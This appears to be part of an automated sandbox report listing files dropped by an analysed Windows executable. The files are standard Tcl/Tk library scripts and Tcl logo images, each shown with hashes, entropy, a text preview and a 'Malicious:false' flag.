                                                                                                                                                                                                                                                                                                                                Preview:# entry.tcl --.#.# This file defines the default bindings for Tk entry widgets and provides.# procedures that help in implementing those bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for example,.#...start dragging out a selection)..# pressX -..X-coordinate at which the mouse button was pressed..# selectMode -..The style of selection currently underway:.#...char, word, or line..# x, y -..La
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4857
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7675047842795895
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:mumhRUI7F2WyHm6BUyNhEf6jUHKRUI7F2WyQe6L763AcnK0/61sk2ko5AgEplauw:ERUQFU52CNRUQFpLOQIG1sk2TCLplauw
                                                                                                                                                                                                                                                                                                                                MD5:7EA007F00BF194722FF144BE274C2176
                                                                                                                                                                                                                                                                                                                                SHA1:6835A515E85A9E55D5A27073DAE1F1A5D7424513
                                                                                                                                                                                                                                                                                                                                SHA-256:40D4E101A64B75361F763479B01207AE71535337E79CE6E162265842F6471EED
                                                                                                                                                                                                                                                                                                                                SHA-512:E2520EB065296C431C71DBBD5503709CF61F93E74FE324F4F8F3FE13131D62435B1E124D38E2EC84939B92198A54B8A71DFC0A8D32F0DD94139C54068FBCAAF2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# focus.tcl --.#.# This file defines several procedures for managing the input.# focus..#.# Copyright (c) 1994-1995 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_focusNext --.# This procedure returns the name of the next window after "w" in.# "focus order" (the window that should receive the focus next if.# Tab is typed in w). "Next" is defined by a pre-order search.# of a top-level and its non-top-level descendants, with the stacking.# order determining the order of siblings. The "-takefocus" options.# on windows determine whether or not they should be skipped..#.# Arguments:.# w -..Name of a window...proc ::tk_focusNext w {. set cur $w. while {1} {...# Descend to just before the first child of the current widget....set parent $cur..set children [winfo children $cur]..set i -1...# Look for the next sibling that isn't a top-level....while {1} {.. incr i..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):15840
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7139053935905535
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:hrAVUJgzMAP2Xg7V5M8Zyc8Ck/YN9G4EM8CPo:hrAVUJgzMAP2Xg7V5MgycO/YpEX
                                                                                                                                                                                                                                                                                                                                MD5:9324DBBE37502E149474E05A3448B6E3
                                                                                                                                                                                                                                                                                                                                SHA1:5584B4EE3BF25E95EE6919437D066586060B6E36
                                                                                                                                                                                                                                                                                                                                SHA-256:CEB558FB76A2C85924CD5F7D3A64E77582E1D461DD9A3C10FEDB4608AD440F5B
                                                                                                                                                                                                                                                                                                                                SHA-512:C688676452F89EC432E93A64AC369CC0B82B19D8D38D2C4034888551591F59D87548FAE12A98EE7735540779566DEB400C27BEAD2C141A9F971BAF9E61C218C6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# fontchooser.tcl -.#.#.A themeable Tk font selection dialog. See TIP #324..#.# Copyright (C) 2008 Keith Vetter.# Copyright (C) 2008 Pat Thoyts <patthoyts@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...namespace eval ::tk::fontchooser {. variable S.. set S(W) .__tk__fontchooser. set S(fonts) [lsort -dictionary [font families]]. set S(styles) [list \. [::msgcat::mc "Regular"] \. [::msgcat::mc "Italic"] \. [::msgcat::mc "Bold"] \. [::msgcat::mc "Bold Italic"] \. ].. set S(sizes) {8 9 10 11 12 14 16 18 20 22 24 26 28 36 48 72}. set S(strike) 0. set S(under) 0. set S(first) 1. set S(sampletext) [::msgcat::mc "AaBbYyZz01"]. set S(-parent) .. set S(-title) [::msgcat::mc "Font"]. set S(-command) "". set S(-font) TkDefaultFont.}..proc ::tk:
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):15978
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8947909611129905
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:xj0OECzN+8JERNLKZhbgIDx3VM5BxBTSgvpn8WYYW5Xb50To3u8PYHPtJYa5PWDx:xrDJE36a7BegvV8hFI8gvXaSn9HqD/U0
                                                                                                                                                                                                                                                                                                                                MD5:105529990CEE968AA5EE3BC827A81A0F
                                                                                                                                                                                                                                                                                                                                SHA1:559BD1AABD1D4719EDB60448CF111F78365A57A9
                                                                                                                                                                                                                                                                                                                                SHA-256:DE0195CCFB6482CCA390C94E91B7877F47742E7A9468CAF362B39AA36305D33C
                                                                                                                                                                                                                                                                                                                                SHA-512:03CB42DFF7AC4F801AA7FFE8A4F07555CCE6874AA1B7F568ACF0299E4DD7F440179838485777F15183EE7C057CCB35868672B1783FBFE67B51D97DBBDAC85281
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# iconlist.tcl.#.#.Implements the icon-list megawidget used in the "Tk" standard file.#.selection dialog boxes..#.# Copyright (c) 1994-1998 Sun Microsystems, Inc..# Copyright (c) 2009 Donal K. Fellows.#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES..#.# API Summary:.#.tk::IconList <path> ?<option> <value>? ....#.<path> add <imageName> <itemList>.#.<path> cget <option>.#.<path> configure ?<option>? ?<value>? ....#.<path> deleteall.#.<path> destroy.#.<path> get <itemIndex>.#.<path> index <index>.#.<path> invoke.#.<path> see <index>.#.<path> selection anchor ?<int>?.#.<path> selection clear <first> ?<last>?.#.<path> selection get.#.<path> selection includes <item>.#.<path> selection set <first> ?<last>?...package require Tk 8.6..::tk::Megawidget create ::tk::IconList ::tk::FocusableWidget {. variable w canvas sbar accel accelCB fill font index \..itemList itemsPerColumn list maxIH maxIW maxTH maxTW noSc
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10883
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.026473720997027
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:TJjPyYK20kt4zHIXM2MxGwwOw0ac5lCssUOixDgzAjTXBHVXPZmEhr:pO2gz6MioacR2iBgzsFHX5r
                                                                                                                                                                                                                                                                                                                                MD5:2652AAD862E8FE06A4EEDFB521E42B75
                                                                                                                                                                                                                                                                                                                                SHA1:ED22459AD3D192AB05A01A25AF07247B89DC6440
                                                                                                                                                                                                                                                                                                                                SHA-256:A78388D68600331D06BB14A4289BC1A46295F48CEC31CEFF5AE783846EA4D161
                                                                                                                                                                                                                                                                                                                                SHA-512:6ECFBB8D136444A5C0DBBCE2D8A4206F1558BDD95F111D3587B095904769AC10782A9EA125D85033AD6532EDF3190E86E255AC0C0C81DC314E02D95CCA86B596
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# icons.tcl --.#.#.A set of stock icons for use in Tk dialogs. The icons used here.#.were provided by the Tango Desktop project which provides a.#.unified set of high quality icons licensed under the.#.Creative Commons Attribution Share-Alike license.#.(http://creativecommons.org/licenses/by-sa/3.0/).#.#.See http://tango.freedesktop.org/Tango_Desktop_Project.#.# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>..namespace eval ::tk::icons {}..image create photo ::tk::icons::warning -data {. iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAABSZJREFU. WIXll1toVEcYgL+Zc87u2Yu7MYmrWRuTJuvdiMuqiJd4yYKXgMQKVkSjFR80kFIVJfWCWlvpg4h9. 8sXGWGof8iKNICYSo6JgkCBEJRG8ImYThNrNxmaTeM7pQ5IlJkabi0/9YZhhZv7///4z/8zPgf+7. KCNRLgdlJijXwRyuDTlcxV9hbzv8nQmxMjg+XDtiOEplkG9PSfkztGmTgmFQd+FCVzwa3fYN/PHZ. AcpBaReicW5xcbb64IEQqko8Lc26d/58cxS+/BY6hmJvyEfQBoUpwWCmW1FErKaGWHU13uRk4QkE. UtxQNFR7QwIoB4eiKD9PWbVKbb10CZmaCqmpxCormRYO26QQx85B0mcD+AeK0xYvHqu1tNDx+DH6. g
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):322
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.341180398587801
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:nVhmHdeA1xNZgkrIf3Ju4dFi6VbGWrWhr3W7FxmVFraGVAJFKyVQR7icrtpwB:nPqf1fZgZA4FJbB6dm7FUjAJVVMM
                                                                                                                                                                                                                                                                                                                                MD5:FC8A86E10C264D42D28E23D9C75E7EE5
                                                                                                                                                                                                                                                                                                                                SHA1:F1BA322448D206623F8FE734192F383D8F7FA198
                                                                                                                                                                                                                                                                                                                                SHA-256:2695ADFF8E900C31B4D86414D22B8A49D6DD865CA3DD99678FA355CDC46093A8
                                                                                                                                                                                                                                                                                                                                SHA-512:29C2DF0D516B5FC8E52CB61CFCD07AF9C90B40436DFE64CEFDB2813C0827CE65BA50E0828141256E2876D4DC251E934A6854A8E0B02CDAF466D0389BD778AEF0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:README - images directory..This directory includes images for the Tcl Logo and the Tcl Powered.Logo. Please feel free to use the Tcl Powered Logo on any of your.products that employ the use of Tcl or Tk. The Tcl logo may also be.used to promote Tcl in your product documentation, web site or other.places you so desire..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):32900
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.235207715374815
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:gGTVOEcRWsdEmhp6k/GLrPMlK3pJr/IbYDGDMtBF2Fz6fsFA/fSvqHWukLI2d0Nr:gGTVOEcRWsdEvLrPJ5Jr/IbYDGDMtBFh
                                                                                                                                                                                                                                                                                                                                MD5:45175418859AF67FE417BD0A053DB6E5
                                                                                                                                                                                                                                                                                                                                SHA1:2B499B7C4EBC8554ECC07B8408632CAF407FB6D5
                                                                                                                                                                                                                                                                                                                                SHA-256:F3E77FD94198EC4783109355536638E9162F9C579475383074D024037D1797D3
                                                                                                                                                                                                                                                                                                                                SHA-512:114A59FD6B99FFD628BA56B8E14FB3B59A0AB6E752E18DEA038F85DBC072BF98492CE9369D180C169EDE9ED2BD521D8C0D607C5E4988F2C83302FC413C6D6A4C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:%!PS-Adobe-3.0 EPSF-3.0.%%Creator: Adobe Illustrator(TM) 5.5.%%For: (Bud Northern) (Mark Anderson Design).%%Title: (TCL/TK LOGO.ILLUS).%%CreationDate: (8/1/96) (4:58 PM).%%BoundingBox: 251 331 371 512.%%HiResBoundingBox: 251.3386 331.5616 370.5213 511.775.%%DocumentProcessColors: Cyan Magenta Yellow.%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0.%%+ procset Adobe_IllustratorA_AI5 1.0 0.%AI5_FileFormat 1.2.%AI3_ColorUsage: Color.%%DocumentCustomColors: (TCL RED).%%CMYKCustomColor: 0 0.45 1 0 (Orange).%%+ 0 0.25 1 0 (Orange Yellow).%%+ 0 0.79 0.91 0 (TCL RED).%AI3_TemplateBox: 306 396 306 396.%AI3_TileBox: 12 12 600 780.%AI3_DocumentPreview: Macintosh_ColorPic.%AI5_ArtSize: 612 792.%AI5_RulerUnits: 0.%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0.%AI5_TargetResolution: 800.%AI5_NumLayers: 1.%AI5_OpenToView: 90 576 2 938 673 18 1 1 2 40.%AI5_OpenViewLayers: 7.%%EndComments.%%BeginProlog.%%BeginResource: procset Adobe_level2_AI5 1.0 0.%%Title: (Adobe Illustrator (R) Version 5.0 Level 2 Emul
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 68 x 100
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2341
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.9734417899888665
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
                                                                                                                                                                                                                                                                                                                                MD5:FF04B357B7AB0A8B573C10C6DA945D6A
                                                                                                                                                                                                                                                                                                                                SHA1:BCB73D8AF2628463A1B955581999C77F09F805B8
                                                                                                                                                                                                                                                                                                                                SHA-256:72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
                                                                                                                                                                                                                                                                                                                                SHA-512:10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......*\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~*].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 43 x 64
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1670
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.326462043862671
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:PF/mIXn3l7+ejbL/4xsgq4sNC6JYp6s/pmp76F:/1nHL404raM/op2
                                                                                                                                                                                                                                                                                                                                MD5:B226CC3DA70AAB2EBB8DFFD0C953933D
                                                                                                                                                                                                                                                                                                                                SHA1:EA52219A37A140FD98AEA66EA54685DD8158D9B1
                                                                                                                                                                                                                                                                                                                                SHA-256:138C240382304F350383B02ED56C69103A9431C0544EB1EC5DCD7DEC7A555DD9
                                                                                                                                                                                                                                                                                                                                SHA-512:3D043F41B887D54CCADBF9E40E48D7FFF99B02B6FAF6B1DD0C6C6FEF0F8A17630252D371DE3C60D3EFBA80A974A0670AF3747E634C59BDFBC78544D878D498D4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF89a+.@...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....+.@........H. .z..(tp......@...92....#. A.......C.\.%...)Z..1a.8s..W/..@....3..C...y$.GW.....5.FU..j..;.F(Pc+W.-..X.D-[.*g....F..`.:mkT...Lw...A/.....u.7p..a..9P.....q2..Xg..G....3}AKv.\.d..yL.>..1.#
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 354 x 520
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11000
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.88559092427108
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:d+nY6zludc/We/yXy9JHBUoIMSapQdrGlapzmyNMK1vbXkgMmgFW/KxIq3NhZe:YnY6p4c/OCHyowaGUaCcMK1vbXNwFW/l
                                                                                                                                                                                                                                                                                                                                MD5:45D9B00C4CF82CC53723B00D876B5E7E
                                                                                                                                                                                                                                                                                                                                SHA1:DDD10E798AF209EFCE022E97448E5EE11CEB5621
                                                                                                                                                                                                                                                                                                                                SHA-256:0F404764D07A6AE2EF9E1E0E8EAAC278B7D488D61CF1C084146F2F33B485F2ED
                                                                                                                                                                                                                                                                                                                                SHA-512:6E89DACF2077E1307DA05C16EF8FDE26E92566086346085BE10A7FD88658B9CDC87A3EC4D17504AF57D5967861B1652FA476B2DDD4D9C6BCFED9C60BB2B03B6F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF89ab.................f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....b..........H......*\....#J.H....3j.... '.;p....(.8X..^.0c.I...z8O.\.....:....$..Fu<8`...P.>%I.gO.C.h-..+.`....@..h....dJ.?...K...H.,U.._.#...g..[.*^.x.....J.L.!.'........=+eZ..i..ynF.8...].y|..m.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 87a, 120 x 181
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3889
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.425138719078912
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:9qqbIh+cE4C8ric/jxK5mxsFBu3/0GIJ6Qap1Y5uMiR8pw5rB/SgijDb+TOh:hy+mnZ7xK5IsTwDQmkdiiG5rB/BE+6h
                                                                                                                                                                                                                                                                                                                                MD5:BD12B645A9B0036A9C24298CD7A81E5A
                                                                                                                                                                                                                                                                                                                                SHA1:13488E4F28676F1E0CE383F80D13510F07198B99
                                                                                                                                                                                                                                                                                                                                SHA-256:4D0BD3228AB4CC3E5159F4337BE969EC7B7334E265C99B7633E3DAF3C3FCFB62
                                                                                                                                                                                                                                                                                                                                SHA-512:F62C996857CA6AD28C9C938E0F12106E0DF5A20D1B4B0B0D17F6294A112359BA82268961F2A054BD040B5FE4057F712206D02F2E668675BBCF6DA59A4DA0A1BB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF87ax............................................................................z.....{..o.....m..b...`{.X....vy...hk.Um.N...I`.D..Z^.LP.?R.;!....?C.5C.3#.l..,6.*&.15...`..#(.If.y.....l...._..#/...Hm.>_.y..4R.k..#6..._......w..*K.^.."<.....G{.w..3_."C.Q..F....v..!K...v.2m.)_.[..!R.u.1t.g..)f. X.O..E..1z.g. _.Z..D..:..0..Z.. f.D..0..'z..m.N..C../.z.svC.q/.m.ze7.\..P..I..1%.,...............................................................................................................................................................................................................................................................................................................................................................................................,....x..........H.......D..!...7.PAQ...._l8.... C.<.a...*.x....0q.. ..M.%.<.HBe.@.....Q..7..XC..P..<z3..X...P.jA.%'@.J.lV.......R.,..+....t....7h.....(..a...+^.'..7..L.....V...s..$....a.....8`.9..}K......
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):27809
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.331778921404698
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:geQTVOEcRWsdEmhp6k/GLrPMlK3pJrNIbYDGDMtBgu2Fz6lR5G/r+FWaGK:gnTVOEcRWsdEvLrPJ5JrNIbYDGDMtB9L
                                                                                                                                                                                                                                                                                                                                MD5:BA1051DBED2B8676CAA24593B88C91B2
                                                                                                                                                                                                                                                                                                                                SHA1:8A58FC19B20BFDC8913515D9B32CCBF8ACF92344
                                                                                                                                                                                                                                                                                                                                SHA-256:2944EBC4AF1894951BF9F1250F4E6EDF811C2183745950EA9A8A926715882CF7
                                                                                                                                                                                                                                                                                                                                SHA-512:4260CEBA7DA9463F32B0C76A2AC19D2B20C8FE48CFBA3DC7AF748AAE15FA25DCBDA085072DF7EFC8F4B4F304C7ED166FE9F93DC903E32FA1874E82D59E544DEF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:%!PS-Adobe-3.0 EPSF-3.0.%%Creator: Adobe Illustrator(TM) 5.5.%%For: (Bud Northern) (Mark Anderson Design).%%Title: (TCL PWRD LOGO.ILLUS).%%CreationDate: (8/1/96) (4:59 PM).%%BoundingBox: 242 302 377 513.%%HiResBoundingBox: 242.0523 302.5199 376.3322 512.5323.%%DocumentProcessColors: Cyan Magenta Yellow.%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0.%%+ procset Adobe_IllustratorA_AI5 1.0 0.%AI5_FileFormat 1.2.%AI3_ColorUsage: Color.%%CMYKCustomColor: 0 0.45 1 0 (Orange).%%+ 0 0.25 1 0 (Orange Yellow).%%+ 0 0.79 0.91 0 (PANTONE Warm Red CV).%%+ 0 0.79 0.91 0 (TCL RED).%AI3_TemplateBox: 306 396 306 396.%AI3_TileBox: 12 12 600 780.%AI3_DocumentPreview: Macintosh_ColorPic.%AI5_ArtSize: 612 792.%AI5_RulerUnits: 0.%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0.%AI5_TargetResolution: 800.%AI5_NumLayers: 1.%AI5_OpenToView: 102 564 2 938 673 18 1 1 2 40.%AI5_OpenViewLayers: 7.%%EndComments.%%BeginProlog.%%BeginResource: procset Adobe_level2_AI5 1.0 0.%%Title: (Adobe Illustrator (R) Version 5.0 Le
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 64 x 100
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1615
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.461273815456419
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:aE45BzojC3r1WAQ+HT2gAdKhPFZ/ObchgB8:V5Gb1WN+yfcObmgW
                                                                                                                                                                                                                                                                                                                                MD5:DBFAE61191B9FADD4041F4637963D84F
                                                                                                                                                                                                                                                                                                                                SHA1:BD971E71AE805C2C2E51DD544D006E92363B6C0C
                                                                                                                                                                                                                                                                                                                                SHA-256:BCC0E6458249433E8CBA6C58122B7C0EFA9557CBC8FB5F9392EED5D2579FC70B
                                                                                                                                                                                                                                                                                                                                SHA-512:ACEAD81CC1102284ED7D9187398304F21B8287019EB98B0C4EC7398DD8B5BA8E7D19CAA891AA9E7C22017B73D734110096C8A7B41A070191223B5543C39E87AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:GIF89a@.d.............................f.................f...ff.f3.f..33.3.........f..ff.f3.33.3.f..f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....@.d....@.pH,..E.... ..(...H$..v..j....K....q..5L......^).3.Y7..r..u.v|g..om...\iHl..p...`G..\~....fn[q...P.g.Z.l....y...\.l......f.Z.g...%%....e...e...)....O.f..e. ....O..qf..%..(.H.u..]..&....#4.......@.).....u!.M..2. ..PJ..#..T..a.....P.Gi... <Hb....x..z.3.X.O..f.........].Bt..lB.Q.r...9pP....&...L. ..,`[.....E6.Q.....?.#L......|g........N....[.._........."4......b....G6.........m.zI].....I.@.......I.9...glew...2.B..c>./..2....x.....<...{...7;.....y.I.....4G.Qj0..7..%.W.V...?!..[...X..=..k.h..[Q<.....0.B....(P.x.,.......8O*Z.8P!.$....u.c..Ea!..eC....CB.. .H..E..#..C..E...z..&.Nu........c.0..#.T.M.U........l.p @..s.|..pf!..&.......8.#.8.....*..J>. .t..h6(........#..0.A...*!..)...x..u.Z....*%..H.....*.......`......|.....1.......&.....T*...f.l...
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 97 x 150
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2489
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.708754027741608
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:/Ev7JJ+3uvz/Hwbcp7igaIwjBui7qFxIIOdJXcI+Ks:M9oWz/7pZAV7qPIImJXtXs
                                                                                                                                                                                                                                                                                                                                MD5:711F4E22670FC5798E4F84250C0D0EAA
                                                                                                                                                                                                                                                                                                                                SHA1:1A1582650E218B0BE6FFDEFFD64D27F4B9A9870F
                                                                                                                                                                                                                                                                                                                                SHA-256:5FC25C30AEE76477F1C4E922931CC806823DF059525583FF5705705D9E913C1C
                                                                                                                                                                                                                                                                                                                                SHA-512:220C36010208A87D0F674DA06D6F5B4D6101D196544ABCB4EE32378C46C781589DB1CE7C7DFE6471A8D8E388EE6A279DB237B18AF1EB9130FF9D0222578F1589
                                                                                                                                                                                                                                                                                                                                Malicious:false
